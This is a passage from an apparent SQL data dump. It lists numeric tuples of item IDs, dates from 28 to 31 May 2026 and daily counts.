0260528',1),(5353,0,'20260528',1),(5356,0,'20260528',1),(5378,0,'20260528',1),(5400,0,'20260528',1),(5412,0,'20260528',1),(5420,0,'20260528',1),(5461,0,'20260528',1),(5472,0,'20260528',1),(5492,0,'20260528',1),(5561,0,'20260528',1),(5567,0,'20260528',1),(5582,0,'20260528',1),(5605,0,'20260528',1),(5626,0,'20260528',1),(5636,0,'20260528',1),(5666,0,'20260528',1),(5696,0,'20260528',1),(5738,0,'20260528',1),(5816,0,'20260528',1),(5868,0,'20260528',1),(5875,0,'20260528',1),(5881,0,'20260528',1),(469,0,'20260528',2),(570,0,'20260528',2),(1590,0,'20260528',2),(1612,0,'20260528',2),(1720,0,'20260528',2),(1728,0,'20260528',2),(1730,0,'20260528',2),(1737,0,'20260528',2),(1739,0,'20260528',2),(1743,0,'20260528',2),(1749,0,'20260528',2),(1776,0,'20260528',2),(1780,0,'20260528',2),(2150,0,'20260528',2),(2297,0,'20260528',2),(2309,0,'20260528',2),(3005,0,'20260528',2),(3006,0,'20260528',2),(3041,0,'20260528',2),(3045,0,'20260528',2),(3066,0,'20260528',2),(3097,0,'20260528',2),(3102,0,'20260528',2),(3117,0,'20260528',2),(3267,0,'20260528',2),(3278,0,'20260528',2),(3438,0,'20260528',2),(3531,0,'20260528',2),(3541,0,'20260528',2),(3714,0,'20260528',2),(3727,0,'20260528',2),(3777,0,'20260528',2),(3781,0,'20260528',2),(4275,0,'20260528',2),(4301,0,'20260528',2),(4363,0,'20260528',2),(4368,0,'20260528',2),(4396,0,'20260528',2),(4444,0,'20260528',2),(4514,0,'20260528',2),(4520,0,'20260528',2),(4566,0,'20260528',2),(4651,0,'20260528',2),(4663,0,'20260528',2),(4709,0,'20260528',2),(4866,0,'20260528',2),(5028,0,'20260528',2),(5058,0,'20260528',2),(5062,0,'20260528',2),(5067,0,'20260528',2),(5076,0,'20260528',2),(5080,0,'20260528',2),(5128,0,'20260528',2),(5131,0,'20260528',2),(5146,0,'20260528',2),(5153,0,'20260528',2),(5256,0,'20260528',2),(5264,0,'20260528',2),(5280,0,'20260528',2),(5292,0,'20260528',2),(5320,0,'20260528',2),(5363,0,'20260528',2),(5428,0,'20260528',2),(5436,0,'20260528',2),(5449,0,'20260528',2),(5662,0,'20260528',2),(5735,0,'20260528',2),(5828,0,'20260528',2),(5833,0,'20260528',2),(5865,0,'20260528',2),(74,0,'20260528',3),(87,0,'20260528',3),(474,0,'20260528',3),(1588,0,'20260528',3),(1610,0,'20260528',3),(1724,0,'20260528',3),(1745,0,'20260528',3),(1770,0,'20260528',3),(3229,0,'20260528',3),(3271,0,'20260528',3),(3498,0,'20260528',3),(3721,0,'20260528',3),(3764,0,'20260528',3),(4420,0,'20260528',3),(4448,0,'20260528',3),(4608,0,'20260528',3),(4722,0,'20260528',3),(4802,0,'20260528',3),(5054,0,'20260528',3),(5071,0,'20260528',3),(5397,0,'20260528',3),(5409,0,'20260528',3),(5489,0,'20260528',3),(5578,0,'20260528',3),(5598,0,'20260528',3),(5785,0,'20260528',3),(5824,0,'20260528',3),(5859,0,'20260528',3),(5878,0,'20260528',3),(5889,0,'20260528',3),(5917,0,'20260528',3),(468,0,'20260528',4),(473,0,'20260528',4),(487,0,'20260528',4),(1582,0,'20260528',4),(1705,0,'20260528',4),(1778,0,'20260528',4),(3030,0,'20260528',4),(4400,0,'20260528',4),(4759,0,'20260528',4),(4930,0,'20260528',4),(5406,0,'20260528',4),(5467,0,'20260528',4),(5593,0,'20260528',4),(5771,0,'20260528',4),(84,0,'20260528',5),(108,0,'20260528',5),(335,0,'20260528',5),(1718,0,'20260528',5),(2704,0,'20260528',5),(3004,0,'20260528',5),(4612,0,'20260528',5),(5884,0,'20260528',5),(5902,0,'20260528',5),(68,0,'20260528',6),(1614,0,'20260528',6),(5502,0,'20260528',6),(5769,0,'20260528',6),(5921,0,'20260528',6),(2503,0,'20260528',7),(5910,0,'20260528',7),(470,0,'20260528',8),(2658,0,'20260528',8),(5872,0,'20260528',8),(76,0,'20260528',9),(89,0,'20260528',9),(91,0,'20260528',14),(5906,0,'20260528',16),(5925,0,'20260528',16),(72,0,'20260528',26),(80,0,'20260528',44),(9,0,'20260528',710),(87,0,'20260529',1),(472,0,'20260529',1),(473,0,'20260529',1),(478,0,'20260529',1),(479,0,'20260529',1),(482,0,'20260529',1),(483,0,'20260529',1),(484,0,'20260529',1),(488,0,'20260529',1),(1592,0,'20260529',1),(1699,0,'20260529',1),(1709,0,'20260529',1),(1713,0,'20260529',1),(1715,0,'20260529',1),(1718,0,'20260529',1),(1720,0,'20260529',1),(1726,0,'20260529',1),(1728,0,'20260529',1),(1730,0,'20260529',1),(1732,0,'20260529',1),(1734,0,'20260529',1),(1745,0,'20260529',1),(1749,0,'20260529',1),(1768,0,'20260529',1),(1772,0,'20260529',1),(1776,0,'20260529',1),(1780,0,'20260529',1),(2063,0,'20260529',1),(2148,0,'20260529',1),(2152,0,'20260529',1),(2159,0,'20260529',1),(2165,0,'20260529',1),(2297,0,'20260529',1),(2309,0,'20260529',1),(2609,0,'20260529',1),(2658,0,'20260529',1),(2775,0,'20260529',1),(2989,0,'20260529',1),(2993,0,'20260529',1),(3006,0,'20260529',1),(3027,0,'20260529',1),(3030,0,'20260529',1),(3063,0,'20260529',1),(3066,0,'20260529',1),(3079,0,'20260529',1),(3090,0,'20260529',1),(3104,0,'20260529',1),(3109,0,'20260529',1),(3117,0,'20260529',1),(3240,0,'20260529',1),(3245,0,'20260529',1),(3247,0,'20260529',1),(3251,0,'20260529',1),(3253,0,'20260529',1),(3257,0,'20260529',1),(3259,0,'20260529',1),(3261,0,'20260529',1),(3263,0,'20260529',1),(3273,0,'20260529',1),(3282,0,'20260529',1),(3290,0,'20260529',1),(3313,0,'20260529',1),(3486,0,'20260529',1),(3489,0,'20260529',1),(3531,0,'20260529',1),(3714,0,'20260529',1),(3724,0,'20260529',1),(3731,0,'20260529',1),(3735,0,'20260529',1),(3738,0,'20260529',1),(3746,0,'20260529',1),(3774,0,'20260529',1),(3777,0,'20260529',1),(4323,0,'20260529',1),(4329,0,'20260529',1),(4335,0,'20260529',1),(4363,0,'20260529',1),(4373,0,'20260529',1),(4382,0,'20260529',1),(4400,0,'20260529',1),(4412,0,'20260529',1),(4416,0,'20260529',1),(4420,0,'20260529',1),(4436,0,'20260529',1),(4440,0,'20260529',1),(4457,0,'20260529',1),(4517,0,'20260529',1),(4529,0,'20260529',1),(4546,0,'20260529',1),(4608,0,'20260529',1),(4648,0,'20260529',1),(4663,0,'20260529',1),(4668,0,'20260529',1),(4674,0,'20260529',1),(4677,0,'20260529',1),(4691,0,'20260529',1),(4706,0,'20260529',1),(4747,0,'20260529',1),(4750,0,'20260529',1),(4762,0,'20260529',1),(4771,0,'20260529',1),(4776,0,'20260529',1),(4977,0,'20260529',1),(4980,0,'20260529',1),(4988,0,'20260529',1),(5037,0,'20260529',1),(5062,0,'20260529',1),(5101,0,'20260529',1),(5122,0,'20260529',1),(5125,0,'20260529',1),(5134,0,'20260529',1),(5140,0,'20260529',1),(5157,0,'20260529',1),(5264,0,'20260529',1),(5268,0,'20260529',1),(5289,0,'20260529',1),(5292,0,'20260529',1),(5295,0,'20260529',1),(5298,0,'20260529',1),(5307,0,'20260529',1),(5323,0,'20260529',1),(5334,0,'20260529',1),(5356,0,'20260529',1),(5363,0,'20260529',1),(5374,0,'20260529',1),(5378,0,'20260529',1),(5383,0,'20260529',1),(5397,0,'20260529',1),(5412,0,'20260529',1),(5428,0,'20260529',1),(5449,0,'20260529',1),(5464,0,'20260529',1),(5467,0,'20260529',1),(5492,0,'20260529',1),(5578,0,'20260529',1),(5585,0,'20260529',1),(5593,0,'20260529',1),(5605,0,'20260529',1),(5609,0,'20260529',1),(5662,0,'20260529',1),(5696,0,'20260529',1),(5700,0,'20260529',1),(5785,0,'20260529',1),(5844,0,'20260529',1),(5859,0,'20260529',1),(5865,0,'20260529',1),(5875,0,'20260529',1),(5889,0,'20260529',1),(74,0,'20260529',2),(76,0,'20260529',2),(84,0,'20260529',2),(108,0,'20260529',2),(476,0,'20260529',2),(1584,0,'20260529',2),(1586,0,'20260529',2),(1695,0,'20260529',2),(1705,0,'20260529',2),(1707,0,'20260529',2),(1711,0,'20260529',2),(1722,0,'20260529',2),(1737,0,'20260529',2),(1739,0,'20260529',2),(1741,0,'20260529',2),(1747,0,'20260529',2),(1766,0,'20260529',2),(1770,0,'20260529',2),(2150,0,'20260529',2),(2293,0,'20260529',2),(2503,0,'20260529',2),(2558,0,'20260529',2),(2813,0,'20260529',2),(3023,0,'20260529',2),(3092,0,'20260529',2),(3096,0,'20260529',2),(3107,0,'20260529',2),(3226,0,'20260529',2),(3229,0,'20260529',2),(3243,0,'20260529',2),(3265,0,'20260529',2),(3269,0,'20260529',2),(3278,0,'20260529',2),(3280,0,'20260529',2),(3287,0,'20260529',2),(3721,0,'20260529',2),(3742,0,'20260529',2),(3764,0,'20260529',2),(4238,0,'20260529',2),(4338,0,'20260529',2),(4377,0,'20260529',2),(4396,0,'20260529',2),(4404,0,'20260529',2),(4428,0,'20260529',2),(4444,0,'20260529',2),(4448,0,'20260529',2),(4566,0,'20260529',2),(4582,0,'20260529',2),(4591,0,'20260529',2),(4651,0,'20260529',2),(4657,0,'20260529',2),(4694,0,'20260529',2),(4709,0,'20260529',2),(4741,0,'20260529',2),(4753,0,'20260529',2),(4756,0,'20260529',2),(4792,0,'20260529',2),(4802,0,'20260529',2),(4858,0,'20260529',2),(4862,0,'20260529',2),(4870,0,'20260529',2),(4874,0,'20260529',2),(4878,0,'20260529',2),(4883,0,'20260529',2),(4888,0,'20260529',2),(5020,0,'20260529',2),(5042,0,'20260529',2),(5046,0,'20260529',2),(5054,0,'20260529',2),(5080,0,'20260529',2),(5131,0,'20260529',2),(5259,0,'20260529',2),(5280,0,'20260529',2),(5304,0,'20260529',2),(5425,0,'20260529',2),(5436,0,'20260529',2),(5454,0,'20260529',2),(5512,0,'20260529',2),(5567,0,'20260529',2),(5570,0,'20260529',2),(5626,0,'20260529',2),(5666,0,'20260529',2),(5674,0,'20260529',2),(5762,0,'20260529',2),(5881,0,'20260529',2),(335,0,'20260529',3),(474,0,'20260529',3),(1582,0,'20260529',3),(1598,0,'20260529',3),(1606,0,'20260529',3),(1612,0,'20260529',3),(1614,0,'20260529',3),(1697,0,'20260529',3),(1782,0,'20260529',3),(2156,0,'20260529',3),(2248,0,'20260529',3),(2296,0,'20260529',3),(2769,0,'20260529',3),(2956,0,'20260529',3),(2991,0,'20260529',3),(3097,0,'20260529',3),(3267,0,'20260529',3),(3285,0,'20260529',3),(3727,0,'20260529',3),(4368,0,'20260529',3),(4408,0,'20260529',3),(4612,0,'20260529',3),(4797,0,'20260529',3),(4866,0,'20260529',3),(4893,0,'20260529',3),(4897,0,'20260529',3),(5033,0,'20260529',3),(5050,0,'20260529',3),(5071,0,'20260529',3),(5076,0,'20260529',3),(5253,0,'20260529',3),(5256,0,'20260529',3),(5415,0,'20260529',3),(5515,0,'20260529',3),(5561,0,'20260529',3),(5636,0,'20260529',3),(5778,0,'20260529',3),(5847,0,'20260529',3),(5872,0,'20260529',3),(5878,0,'20260529',3),(5884,0,'20260529',3),(5917,0,'20260529',3),(570,0,'20260529',4),(1600,0,'20260529',4),(1724,0,'20260529',4),(1778,0,'20260529',4),(3004,0,'20260529',4),(3038,0,'20260529',4),(3087,0,'20260529',4),(3275,0,'20260529',4),(3297,0,'20260529',4),(4357,0,'20260529',4),(4432,0,'20260529',4),(5128,0,'20260529',4),(5146,0,'20260529',4),(5301,0,'20260529',4),(5359,0,'20260529',4),(5400,0,'20260529',4),(5409,0,'20260529',4),(5441,0,'20260529',4),(5489,0,'20260529',4),(5769,0,'20260529',4),(5821,0,'20260529',4),(5868,0,'20260529',4),(89,0,'20260529',5),(2904,0,'20260529',5),(3060,0,'20260529',5),(3249,0,'20260529',5),(4520,0,'20260529',5),(4983,0,'20260529',5),(5276,0,'20260529',5),(5353,0,'20260529',5),(5406,0,'20260529',5),(3271,0,'20260529',6),(4542,0,'20260529',6),(4556,0,'20260529',6),(5163,0,'20260529',6),(5420,0,'20260529',6),(5502,0,'20260529',6),(5902,0,'20260529',6),(5906,0,'20260529',6),(1774,0,'20260529',7),(3102,0,'20260529',7),(5824,0,'20260529',7),(68,0,'20260529',8),(91,0,'20260529',9),(2751,0,'20260529',9),(3781,0,'20260529',9),(72,0,'20260529',10),(5910,0,'20260529',10),(80,0,'20260529',31),(9,0,'20260529',1111),(102,0,'20260530',1),(108,0,'20260530',1),(470,0,'20260530',1),(471,0,'20260530',1),(480,0,'20260530',1),(482,0,'20260530',1),(484,0,'20260530',1),(485,0,'20260530',1),(1544,0,'20260530',1),(1586,0,'20260530',1),(1590,0,'20260530',1),(1594,0,'20260530',1),(1604,0,'20260530',1),(1606,0,'20260530',1),(1695,0,'20260530',1),(1699,0,'20260530',1),(1701,0,'20260530',1),(1707,0,'20260530',1),(1709,0,'20260530',1),(1720,0,'20260530',1),(1722,0,'20260530',1),(1732,0,'20260530',1),(1743,0,'20260530',1),(1766,0,'20260530',1),(1770,0,'20260530',1),(2063,0,'20260530',1),(2156,0,'20260530',1),(2159,0,'20260530',1),(2165,0,'20260530',1),(2248,0,'20260530',1),(2293,0,'20260530',1),(2296,0,'20260530',1),(2309,0,'20260530',1),(2748,0,'20260530',1),(2751,0,'20260530',1),(2769,0,'20260530',1),(2801,0,'20260530',1),(2813,0,'20260530',1),(2965,0,'20260530',1),(3005,0,'20260530',1),(3027,0,'20260530',1),(3030,0,'20260530',1),(3090,0,'20260530',1),(3226,0,'20260530',1),(3245,0,'20260530',1),(3265,0,'20260530',1),(3267,0,'20260530',1),(3285,0,'20260530',1),(3313,0,'20260530',1),(3316,0,'20260530',1),(3727,0,'20260530',1),(3746,0,'20260530',1),(4301,0,'20260530',1),(4329,0,'20260530',1),(4338,0,'20260530',1),(4373,0,'20260530',1),(4387,0,'20260530',1),(4412,0,'20260530',1),(4440,0,'20260530',1),(4444,0,'20260530',1),(4448,0,'20260530',1),(4457,0,'20260530',1),(4546,0,'20260530',1),(4582,0,'20260530',1),(4688,0,'20260530',1),(4709,0,'20260530',1),(4741,0,'20260530',1),(4866,0,'20260530',1),(4878,0,'20260530',1),(4883,0,'20260530',1),(4980,0,'20260530',1),(5042,0,'20260530',1),(5054,0,'20260530',1),(5080,0,'20260530',1),(5131,0,'20260530',1),(5140,0,'20260530',1),(5146,0,'20260530',1),(5157,0,'20260530',1),(5259,0,'20260530',1),(5276,0,'20260530',1),(5289,0,'20260530',1),(5353,0,'20260530',1),(5415,0,'20260530',1),(5428,0,'20260530',1),(5472,0,'20260530',1),(5582,0,'20260530',1),(5601,0,'20260530',1),(5666,0,'20260530',1),(5674,0,'20260530',1),(5816,0,'20260530',1),(5821,0,'20260530',1),(5824,0,'20260530',1),(5833,0,'20260530',1),(5844,0,'20260530',1),(5872,0,'20260530',1),(74,0,'20260530',2),(106,0,'20260530',2),(467,0,'20260530',2),(468,0,'20260530',2),(469,0,'20260530',2),(472,0,'20260530',2),(477,0,'20260530',2),(478,0,'20260530',2),(479,0,'20260530',2),(488,0,'20260530',2),(570,0,'20260530',2),(1582,0,'20260530',2),(1588,0,'20260530',2),(1612,0,'20260530',2),(1697,0,'20260530',2),(1711,0,'20260530',2),(1718,0,'20260530',2),(1730,0,'20260530',2),(1734,0,'20260530',2),(1737,0,'20260530',2),(1749,0,'20260530',2),(1772,0,'20260530',2),(1780,0,'20260530',2),(1782,0,'20260530',2),(2150,0,'20260530',2),(2152,0,'20260530',2),(2252,0,'20260530',2),(2558,0,'20260530',2),(2609,0,'20260530',2),(2704,0,'20260530',2),(2804,0,'20260530',2),(2809,0,'20260530',2),(2911,0,'20260530',2),(3004,0,'20260530',2),(3006,0,'20260530',2),(3023,0,'20260530',2),(3034,0,'20260530',2),(3041,0,'20260530',2),(3045,0,'20260530',2),(3066,0,'20260530',2),(3069,0,'20260530',2),(3072,0,'20260530',2),(3102,0,'20260530',2),(3107,0,'20260530',2),(3109,0,'20260530',2),(3117,0,'20260530',2),(3229,0,'20260530',2),(3240,0,'20260530',2),(3243,0,'20260530',2),(3249,0,'20260530',2),(3251,0,'20260530',2),(3253,0,'20260530',2),(3259,0,'20260530',2),(3261,0,'20260530',2),(3263,0,'20260530',2),(3269,0,'20260530',2),(3271,0,'20260530',2),(3275,0,'20260530',2),(3278,0,'20260530',2),(3287,0,'20260530',2),(3290,0,'20260530',2),(3498,0,'20260530',2),(3714,0,'20260530',2),(3721,0,'20260530',2),(3724,0,'20260530',2),(3731,0,'20260530',2),(3735,0,'20260530',2),(3738,0,'20260530',2),(3764,0,'20260530',2),(4332,0,'20260530',2),(4357,0,'20260530',2),(4368,0,'20260530',2),(4382,0,'20260530',2),(4391,0,'20260530',2),(4396,0,'20260530',2),(4404,0,'20260530',2),(4416,0,'20260530',2),(4420,0,'20260530',2),(4432,0,'20260530',2),(4524,0,'20260530',2),(4529,0,'20260530',2),(4542,0,'20260530',2),(4608,0,'20260530',2),(4612,0,'20260530',2),(4681,0,'20260530',2),(4694,0,'20260530',2),(4697,0,'20260530',2),(4703,0,'20260530',2),(4706,0,'20260530',2),(4765,0,'20260530',2),(4802,0,'20260530',2),(4858,0,'20260530',2),(4862,0,'20260530',2),(4870,0,'20260530',2),(4897,0,'20260530',2),(4930,0,'20260530',2),(4977,0,'20260530',2),(4996,0,'20260530',2),(5028,0,'20260530',2),(5033,0,'20260530',2),(5037,0,'20260530',2),(5046,0,'20260530',2),(5050,0,'20260530',2),(5067,0,'20260530',2),(5101,0,'20260530',2),(5163,0,'20260530',2),(5253,0,'20260530',2),(5268,0,'20260530',2),(5271,0,'20260530',2),(5298,0,'20260530',2),(5301,0,'20260530',2),(5307,0,'20260530',2),(5314,0,'20260530',2),(5326,0,'20260530',2),(5334,0,'20260530',2),(5359,0,'20260530',2),(5363,0,'20260530',2),(5374,0,'20260530',2),(5406,0,'20260530',2),(5409,0,'20260530',2),(5420,0,'20260530',2),(5425,0,'20260530',2),(5433,0,'20260530',2),(5441,0,'20260530',2),(5461,0,'20260530',2),(5492,0,'20260530',2),(5502,0,'20260530',2),(5561,0,'20260530',2),(5578,0,'20260530',2),(5593,0,'20260530',2),(5636,0,'20260530',2),(5662,0,'20260530',2),(5696,0,'20260530',2),(5769,0,'20260530',2),(5785,0,'20260530',2),(5847,0,'20260530',2),(5878,0,'20260530',2),(5881,0,'20260530',2),(5889,0,'20260530',2),(5917,0,'20260530',2),(5921,0,'20260530',2),(87,0,'20260530',3),(335,0,'20260530',3),(481,0,'20260530',3),(483,0,'20260530',3),(486,0,'20260530',3),(1598,0,'20260530',3),(1610,0,'20260530',3),(1705,0,'20260530',3),(1713,0,'20260530',3),(1724,0,'20260530',3),(1726,0,'20260530',3),(1728,0,'20260530',3),(1739,0,'20260530',3),(1745,0,'20260530',3),(1768,0,'20260530',3),(1774,0,'20260530',3),(1776,0,'20260530',3),(2148,0,'20260530',3),(2154,0,'20260530',3),(2161,0,'20260530',3),(2178,0,'20260530',3),(2457,0,'20260530',3),(2617,0,'20260530',3),(2775,0,'20260530',3),(2904,0,'20260530',3),(2964,0,'20260530',3),(2991,0,'20260530',3),(3079,0,'20260530',3),(3083,0,'20260530',3),(3087,0,'20260530',3),(3092,0,'20260530',3),(3097,0,'20260530',3),(3257,0,'20260530',3),(3280,0,'20260530',3),(3297,0,'20260530',3),(3479,0,'20260530',3),(3489,0,'20260530',3),(3531,0,'20260530',3),(3534,0,'20260530',3),(3710,0,'20260530',3),(3749,0,'20260530',3),(3771,0,'20260530',3),(3774,0,'20260530',3),(3777,0,'20260530',3),(4323,0,'20260530',3),(4326,0,'20260530',3),(4341,0,'20260530',3),(4363,0,'20260530',3),(4408,0,'20260530',3),(4428,0,'20260530',3),(4514,0,'20260530',3),(4517,0,'20260530',3),(4551,0,'20260530',3),(4591,0,'20260530',3),(4648,0,'20260530',3),(4651,0,'20260530',3),(4674,0,'20260530',3),(4691,0,'20260530',3),(4712,0,'20260530',3),(4722,0,'20260530',3),(4744,0,'20260530',3),(4768,0,'20260530',3),(4771,0,'20260530',3),(4776,0,'20260530',3),(4792,0,'20260530',3),(4874,0,'20260530',3),(4888,0,'20260530',3),(4893,0,'20260530',3),(4983,0,'20260530',3),(5020,0,'20260530',3),(5058,0,'20260530',3),(5071,0,'20260530',3),(5122,0,'20260530',3),(5137,0,'20260530',3),(5256,0,'20260530',3),(5280,0,'20260530',3),(5292,0,'20260530',3),(5304,0,'20260530',3),(5317,0,'20260530',3),(5320,0,'20260530',3),(5356,0,'20260530',3),(5378,0,'20260530',3),(5412,0,'20260530',3),(5449,0,'20260530',3),(5464,0,'20260530',3),(5467,0,'20260530',3),(5567,0,'20260530',3),(5570,0,'20260530',3),(5585,0,'20260530',3),(5605,0,'20260530',3),(5683,0,'20260530',3),(5700,0,'20260530',3),(5738,0,'20260530',3),(5762,0,'20260530',3),(5865,0,'20260530',3),(5868,0,'20260530',3),(5875,0,'20260530',3),(5884,0,'20260530',3),(5906,0,'20260530',3),(5925,0,'20260530',3),(110,0,'20260530',4),(476,0,'20260530',4),(1703,0,'20260530',4),(1715,0,'20260530',4),(2956,0,'20260530',4),(2989,0,'20260530',4),(2993,0,'20260530',4),(3038,0,'20260530',4),(3063,0,'20260530',4),(3096,0,'20260530',4),(3124,0,'20260530',4),(3127,0,'20260530',4),(3247,0,'20260530',4),(3282,0,'20260530',4),(3430,0,'20260530',4),(3482,0,'20260530',4),(3486,0,'20260530',4),(3541,0,'20260530',4),(3742,0,'20260530',4),(3752,0,'20260530',4),(4238,0,'20260530',4),(4275,0,'20260530',4),(4335,0,'20260530',4),(4377,0,'20260530',4),(4400,0,'20260530',4),(4424,0,'20260530',4),(4454,0,'20260530',4),(4556,0,'20260530',4),(4566,0,'20260530',4),(4587,0,'20260530',4),(4654,0,'20260530',4),(4660,0,'20260530',4),(4750,0,'20260530',4),(4762,0,'20260530',4),(4797,0,'20260530',4),(4988,0,'20260530',4),(5125,0,'20260530',4),(5128,0,'20260530',4),(5134,0,'20260530',4),(5264,0,'20260530',4),(5295,0,'20260530',4),(5323,0,'20260530',4),(5436,0,'20260530',4),(5512,0,'20260530',4),(5735,0,'20260530',4),(5778,0,'20260530',4),(5859,0,'20260530',4),(487,0,'20260530',5),(1602,0,'20260530',5),(1614,0,'20260530',5),(1741,0,'20260530',5),(1751,0,'20260530',5),(2503,0,'20260530',5),(2658,0,'20260530',5),(3307,0,'20260530',5),(3781,0,'20260530',5),(4520,0,'20260530',5),(4657,0,'20260530',5),(4663,0,'20260530',5),(4677,0,'20260530',5),(4685,0,'20260530',5),(4976,0,'20260530',5),(5062,0,'20260530',5),(5076,0,'20260530',5),(5310,0,'20260530',5),(5400,0,'20260530',5),(5454,0,'20260530',5),(5457,0,'20260530',5),(5515,0,'20260530',5),(5902,0,'20260530',5),(5910,0,'20260530',5),(84,0,'20260530',6),(2297,0,'20260530',6),(3438,0,'20260530',6),(4436,0,'20260530',6),(4645,0,'20260530',6),(4668,0,'20260530',6),(4700,0,'20260530',6),(4747,0,'20260530',6),(4753,0,'20260530',6),(4756,0,'20260530',6),(5024,0,'20260530',6),(5598,0,'20260530',6),(474,0,'20260530',7),(1778,0,'20260530',7),(3060,0,'20260530',7),(4759,0,'20260530',7),(76,0,'20260530',8),(89,0,'20260530',8),(5397,0,'20260530',8),(5489,0,'20260530',8),(3273,0,'20260530',10),(5930,0,'20260530',11),(72,0,'20260530',14),(91,0,'20260530',16),(68,0,'20260530',20),(80,0,'20260530',26),(9,0,'20260530',1033),(110,0,'20260531',1),(471,0,'20260531',1),(472,0,'20260531',1),(483,0,'20260531',1),(484,0,'20260531',1),(488,0,'20260531',1),(1544,0,'20260531',1),(1586,0,'20260531',1),(1590,0,'20260531',1),(1600,0,'20260531',1),(1606,0,'20260531',1),(1612,0,'20260531',1),(1614,0,'20260531',1),(1695,0,'20260531',1),(1703,0,'20260531',1),(1707,0,'20260531',1),(1709,0,'20260531',1),(1711,0,'20260531',1),(1715,0,'20260531',1),(1720,0,'20260531',1),(1726,0,'20260531',1),(1728,0,'20260531',1),(1730,0,'20260531',1),(1737,0,'20260531',1),(1739,0,'20260531',1),(1743,0,'20260531',1),(1745,0,'20260531',1),(1751,0,'20260531',1),(1766,0,'20260531',1),(1768,0,'20260531',1),(2063,0,'20260531',1),(2152,0,'20260531',1),(2154,0,'20260531',1),(2156,0,'20260531',1),(2165,0,'20260531',1),(2252,0,'20260531',1),(2457,0,'20260531',1),(2748,0,'20260531',1),(2804,0,'20260531',1),(2813,0,'20260531',1),(2911,0,'20260531',1),(2964,0,'20260531',1),(2991,0,'20260531',1),(2993,0,'20260531',1),(3004,0,'20260531',1),(3005,0,'20260531',1),(3027,0,'20260531',1),(3041,0,'20260531',1),(3063,0,'20260531',1),(3066,0,'20260531',1),(3087,0,'20260531',1),(3092,0,'20260531',1),(3097,0,'20260531',1),(3109,0,'20260531',1),(3124,0,'20260531',1),(3226,0,'20260531',1),(3240,0,'20260531',1),(3249,0,'20260531',1),(3263,0,'20260531',1),(3265,0,'20260531',1),(3269,0,'20260531',1),(3275,0,'20260531',1),(3282,0,'20260531',1),(3287,0,'20260531',1),(3297,0,'20260531',1),(3482,0,'20260531',1),(3486,0,'20260531',1),(3498,0,'20260531',1),(3534,0,'20260531',1),(3710,0,'20260531',1),(3721,0,'20260531',1),(3727,0,'20260531',1),(3746,0,'20260531',1),(3752,0,'20260531',1),(3764,0,'20260531',1),(3777,0,'20260531',1),(4238,0,'20260531',1),(4329,0,'20260531',1),(4341,0,'20260531',1),(4363,0,'20260531',1),(4387,0,'20260531',1),(4400,0,'20260531',1),(4408,0,'20260531',1),(4412,0,'20260531',1),(4416,0,'20260531',1),(4440,0,'20260531',1),(4444,0,'20260531',1),(4454,0,'20260531',1),(4457,0,'20260531',1),(4517,0,'20260531',1),(4524,0,'20260531',1),(4566,0,'20260531',1),(4587,0,'20260531',1),(4612,0,'20260531',1),(4648,0,'20260531',1),(4654,0,'20260531',1),(4668,0,'20260531',1),(4681,0,'20260531',1),(4685,0,'20260531',1),(4691,0,'20260531',1),(4694,0,'20260531',1),(4700,0,'20260531',1),(4706,0,'20260531',1),(4722,0,'20260531',1),(4741,0,'20260531',1),(4747,0,'20260531',1),(4874,0,'20260531',1),(4883,0,'20260531',1),(4980,0,'20260531',1),(4983,0,'20260531',1),(5020,0,'20260531',1),(5024,0,'20260531',1),(5028,0,'20260531',1),(5046,0,'20260531',1),(5058,0,'20260531',1),(5062,0,'20260531',1),(5128,0,'20260531',1),(5131,0,'20260531',1),(5157,0,'20260531',1),(5163,0,'20260531',1),(5248,0,'20260531',1),(5253,0,'20260531',1),(5259,0,'20260531',1),(5292,0,'20260531',1),(5301,0,'20260531',1),(5317,0,'20260531',1),(5323,0,'20260531',1),(5326,0,'20260531',1),(5356,0,'20260531',1),(5359,0,'20260531',1),(5378,0,'20260531',1),(5406,0,'20260531',1),(5412,0,'20260531',1),(5425,0,'20260531',1),(5441,0,'20260531',1),(5449,0,'20260531',1),(5457,0,'20260531',1),(5461,0,'20260531',1),(5464,0,'20260531',1),(5472,0,'20260531',1),(5512,0,'20260531',1),(5515,0,'20260531',1),(5578,0,'20260531',1),(5582,0,'20260531',1),(5585,0,'20260531',1),(5598,0,'20260531',1),(5601,0,'20260531',1),(5609,0,'20260531',1),(5636,0,'20260531',1),(5662,0,'20260531',1),(5666,0,'20260531',1),(5696,0,'20260531',1),(5738,0,'20260531',1),(5762,0,'20260531',1),(5771,0,'20260531',1),(5847,0,'20260531',1),(5889,0,'20260531',1),(476,0,'20260531',2),(480,0,'20260531',2),(481,0,'20260531',2),(485,0,'20260531',2),(486,0,'20260531',2),(570,0,'20260531',2),(1594,0,'20260531',2),(1596,0,'20260531',2),(1598,0,'20260531',2),(1610,0,'20260531',2),(1697,0,'20260531',2),(1699,0,'20260531',2),(1701,0,'20260531',2),(1705,0,'20260531',2),(1713,0,'20260531',2),(1722,0,'20260531',2),(1732,0,'20260531',2),(1734,0,'20260531',2),(1747,0,'20260531',2),(1782,0,'20260531',2),(2148,0,'20260531',2),(2150,0,'20260531',2),(2161,0,'20260531',2),(2178,0,'20260531',2),(2293,0,'20260531',2),(2309,0,'20260531',2),(2609,0,'20260531',2),(2769,0,'20260531',2),(2775,0,'20260531',2),(2801,0,'20260531',2),(2809,0,'20260531',2),(2965,0,'20260531',2),(3023,0,'20260531',2),(3030,0,'20260531',2),(3034,0,'20260531',2),(3104,0,'20260531',2),(3127,0,'20260531',2),(3247,0,'20260531',2),(3253,0,'20260531',2),(3259,0,'20260531',2),(3261,0,'20260531',2),(3307,0,'20260531',2),(3313,0,'20260531',2),(3316,0,'20260531',2),(3430,0,'20260531',2),(3489,0,'20260531',2),(3541,0,'20260531',2),(3724,0,'20260531',2),(3742,0,'20260531',2),(4301,0,'20260531',2),(4338,0,'20260531',2),(4404,0,'20260531',2),(4591,0,'20260531',2),(4645,0,'20260531',2),(4657,0,'20260531',2),(4663,0,'20260531',2),(4677,0,'20260531',2),(4703,0,'20260531',2),(4709,0,'20260531',2),(4712,0,'20260531',2),(4753,0,'20260531',2),(4756,0,'20260531',2),(4759,0,'20260531',2),(4768,0,'20260531',2),(4797,0,'20260531',2),(4858,0,'20260531',2),(4870,0,'20260531',2),(4878,0,'20260531',2),(5033,0,'20260531',2),(5146,0,'20260531',2),(5289,0,'20260531',2),(5310,0,'20260531',2),(5353,0,'20260531',2),(5383,0,'20260531',2),(5397,0,'20260531',2),(5415,0,'20260531',2),(5420,0,'20260531',2),(5454,0,'20260531',2),(5492,0,'20260531',2),(5561,0,'20260531',2),(55